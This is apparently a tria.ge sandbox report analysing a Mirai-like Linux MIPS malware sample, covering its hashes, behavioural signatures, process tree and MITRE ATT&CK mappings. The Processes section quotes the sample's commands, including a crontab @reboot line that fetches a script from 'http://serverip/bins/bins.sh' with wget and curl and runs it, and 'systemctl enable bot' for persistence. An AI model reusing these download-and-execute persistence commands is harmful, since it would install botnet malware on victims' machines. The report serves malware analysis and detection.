Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20231215-en -
resource tags
arch:mipselimage:debian9-mipsel-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
19/02/2024, 06:25
Static task
static1
Behavioral task
behavioral1
Sample
ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
Resource
debian9-mipsel-20231215-en
General
-
Target
ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
-
Size
98KB
-
MD5
e5409ee931e29ffc035bf8802a141084
-
SHA1
ce5d9cbe2ce5c217d55472240afb05a21d6ea69e
-
SHA256
ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731
-
SHA512
6793c7247613d08903105dcb41e33e9785f0c78c186217383b87814d6465b94add98113442b4b56c8f0f00d10d514420b9f9a3e2424d7d2eb77a87f44bdc79f4
-
SSDEEP
1536:nR8r9obMb1xSK0AqVNvBOUUiMx7CBSkHC3eANKlDZQYr8N4eAe7ZiA:nRG9obMb1xb0AqVi3eLDhje7V
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself telnetd 697 ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for modification /dev/misc/watchdog ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.6oSfa1 crontab -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc File opened for modification /root/.bashrc -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc File opened for reading /proc/net/tcp -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 1 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc File opened for modification /lib/systemd/system/bot.service -
Modifies Bash startup script 1 TTPs 1 IoCs
description ioc File opened for modification /root/.bashrc -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc File opened for reading /proc/net/tcp -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/732/cmdline Process not Found File opened for reading /proc/885/cmdline Process not Found File opened for reading /proc/5/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/5/cmdline Process not Found File opened for reading /proc/9/cmdline Process not Found File opened for reading /proc/714/cmdline Process not Found File opened for reading /proc/858/cmdline Process not Found File opened for reading /proc/4/cmdline Process not Found File opened for reading /proc/69/cmdline Process not Found File opened for reading /proc/71/cmdline Process not Found File opened for reading /proc/811/cmdline Process not Found File opened for reading /proc/filesystems systemctl File opened for reading /proc/840/cmdline Process not Found File opened for reading /proc/16/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/668/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/24/cmdline Process not Found File opened for reading /proc/73/cmdline Process not Found File opened for reading /proc/21/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/7/cmdline Process not Found File opened for reading /proc/390/cmdline Process not Found File opened for reading /proc/766/cmdline Process not Found File opened for reading /proc/70/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/149/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/800/cmdline Process not Found File opened for reading /proc/836/cmdline Process not Found File opened for reading /proc/887/cmdline Process not Found File opened for reading /proc/144/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/727/cmdline Process not Found File opened for reading /proc/810/cmdline Process not Found File opened for reading /proc/826/cmdline Process not Found File opened for reading /proc/863/cmdline Process not Found File opened for reading /proc/865/cmdline Process not Found File opened for reading /proc/772/cmdline Process not Found File opened for reading /proc/837/cmdline Process not Found File opened for reading /proc/843/cmdline Process not Found File opened for reading /proc/852/cmdline Process not Found File opened for reading /proc/689/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/768/cmdline Process not Found File opened for reading /proc/886/cmdline Process not Found File opened for reading /proc/683/cmdline Process not Found File opened for reading /proc/777/cmdline Process not Found File opened for reading /proc/801/cmdline Process not Found File opened for reading /proc/817/cmdline Process not Found File opened for reading /proc/687/cmdline Process not Found File opened for reading /proc/761/cmdline Process not Found File opened for reading /proc/799/cmdline Process not Found File opened for reading /proc/870/cmdline Process not Found File opened for reading /proc/833/cmdline Process not Found File opened for reading /proc/857/cmdline Process not Found File opened for reading /proc/82/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/1/cmdline Process not Found File opened for reading /proc/6/cmdline Process not Found File opened for reading /proc/695/cmdline Process not Found File opened for reading /proc/72/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/829/cmdline Process not Found File opened for reading /proc/859/cmdline Process not Found File opened for reading /proc/861/cmdline Process not Found File opened for reading /proc/803/cmdline Process not Found File opened for reading /proc/825/cmdline Process not Found File opened for reading /proc/844/cmdline Process not Found File opened for reading /proc/856/cmdline Process not Found File opened for reading /proc/7/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/18/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf File opened for reading /proc/19/cmdline ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
Processes
-
/tmp/ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf/tmp/ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf1⤵
- Changes its process name
- Modifies Watchdog functionality
- Reads runtime system information
PID:697
-
/bin/shsh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"1⤵PID:709
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:712
-
-
/bin/shsh bins.sh2⤵PID:711
-
-
/usr/bin/crontabcrontab -l1⤵PID:713
-
/bin/chmodchmod +x bins.sh1⤵PID:717
-
/bin/shsh bins.sh1⤵PID:718
-
/bin/curl/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh1⤵PID:720
-
/bin/chmodchmod +x bins.sh1⤵PID:721
-
/bin/shsh -c "/bin/systemctl enable bot"1⤵PID:722
-
/bin/systemctl/bin/systemctl enable bot2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:723
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Hijack Execution Flow
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Hijack Execution Flow
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
356B
MD5f03c70cd4c61a1852f9e19b8fb0d639c
SHA1a6c078ffffdf05c4c47b273b24e6b3ff4ef7e008
SHA256ae50a3052a395987a2779deb9253d4aa8638f2f8b1cda7df9039388f21be7a90
SHA5126277fbbffcdd72fc3712721525538ac07fc46d290ebb02be34cef52b3e62bfa8a66f4e834d364d220108c815192e391ad986f05662fcbfae674417507f4bcc20
-
Filesize
235B
MD5a2c0cc09cb164e5d3737cbb278f9de89
SHA16b603cb91d1504052b9fca0c4d35d4a7e454aef3
SHA25689b7403cf88dce252c8c767c1738f14893c16aa1683665fb06c4cfcfbfbc0d6c
SHA512d460e905a1a1fd2981ef17bae23af307cda3000d2e7507ec654c7960bb88d70b455f7c183bac7c38dfc6d7621a8f758041fd37b17b9ec028e7f6a5b0cd759644